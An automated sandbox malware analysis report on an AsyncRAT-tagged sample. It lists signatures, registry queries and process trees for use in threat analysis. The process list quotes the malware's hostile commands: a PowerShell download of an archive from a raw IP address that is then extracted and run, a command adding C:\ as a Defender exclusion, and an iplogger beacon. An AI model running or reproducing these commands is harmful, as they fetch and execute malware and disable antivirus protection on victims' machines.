Malware Analysis Report

2024-09-22 07:11

Sample ID 240601-sykp2aff5w
Target Trojan;MSIL.FormBook.AFO!MTB.zip
SHA256 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Tags
asyncrat default fresh bootkit discovery execution persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Threat Level: Known bad

The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat default fresh bootkit discovery execution persistence rat

AsyncRat

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks computer location settings

Uses the VBS compiler for execution

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-01 15:32

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 15:32

Reported

2024-06-01 15:33

Platform

win10v2004-20240508-en

Max time kernel

43s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4124,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:8

Network

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 15:32

Reported

2024-06-01 15:33

Platform

win10v2004-20240426-en

Max time kernel

46s

Max time network

35s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Пароли Chrome.csv"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Пароли Chrome.csv"

Network

Files

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 15:32

Reported

2024-06-01 15:33

Platform

win10v2004-20240426-en

Max time kernel

41s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

Signatures

AsyncRat

rat asyncrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document.exe N/A

Uses the VBS compiler for execution

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 2960 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 2960 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 2960 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\55.exe
PID 2960 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\55.exe
PID 2960 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\55.exe
PID 2960 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\3.exe
PID 2960 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\3.exe
PID 2960 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\3.exe
PID 2960 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
PID 2960 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
PID 2960 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
PID 2960 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\17.exe
PID 2960 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\17.exe
PID 2960 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\17.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3200 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\a\3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2276 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\a\17.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\a\17.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\a\17.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\network.exe
PID 2960 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\network.exe
PID 2960 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\network.exe
PID 2960 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
PID 2960 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
PID 2960 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4832 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\a\network.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2960 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 2960 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 2960 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 4732 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4732 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2960 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 2960 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 2960 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"

C:\Users\Admin\AppData\Local\Temp\a\55.exe

"C:\Users\Admin\AppData\Local\Temp\a\55.exe"

C:\Users\Admin\AppData\Local\Temp\a\3.exe

"C:\Users\Admin\AppData\Local\Temp\a\3.exe"

C:\Users\Admin\AppData\Local\Temp\a\munqk.exe

"C:\Users\Admin\AppData\Local\Temp\a\munqk.exe"

C:\Users\Admin\AppData\Local\Temp\a\17.exe

"C:\Users\Admin\AppData\Local\Temp\a\17.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2804 -ip 2804

C:\Users\Admin\AppData\Local\Temp\a\network.exe

"C:\Users\Admin\AppData\Local\Temp\a\network.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12

C:\Users\Admin\AppData\Local\Temp\a\maikati.exe

"C:\Users\Admin\AppData\Local\Temp\a\maikati.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

-arguments

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4832 -ip 4832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 612

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe

"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe

"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"

C:\Users\Admin\AppData\Local\Temp\a\New.exe

"C:\Users\Admin\AppData\Local\Temp\a\New.exe"

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ff8520346f8,0x7ff852034708,0x7ff852034718

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

